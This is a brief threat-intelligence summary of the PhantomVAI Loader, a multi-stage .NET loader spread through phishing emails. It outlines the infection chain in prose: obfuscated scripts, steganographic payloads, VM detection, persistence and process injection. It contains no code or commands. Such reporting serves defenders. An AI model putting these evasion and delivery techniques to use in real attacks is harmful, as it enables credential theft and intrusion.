PhantomVAI Loader: New Multi-Stage .NET Loader in Phishing Campaigns

PhantomVAI Loader, a newly renamed multi-stage .NET loader, is being used in widespread phishing campaigns to deliver various information-stealing malware. The loader, initially identified as Katz Stealer Loader, now supports multiple payloads through an evasive infection chain that includes obfuscated scripts, steganography, and virtual-machine detection. Organizations across multiple sectors have been targeted in this global campaign. The loader is available on underground marketplaces, allowing even low-skill actors to launch complex attacks. The infection chain involves phishing emails with themes of sales, payments, or legal actions, sometimes using homograph attacks to trick recipients. The emails contain ZIP archives with obfuscated JavaScript or VBS files that embed a Base64-encoded PowerShell script, which fetches a GIF file with a steganographically hidden DLL payload. The PhantomVAI Loader performs virtual-machine detection checks and establishes persistence through scheduled tasks or Run registry keys before downloading the final payload and injecting it into a legitimate executable.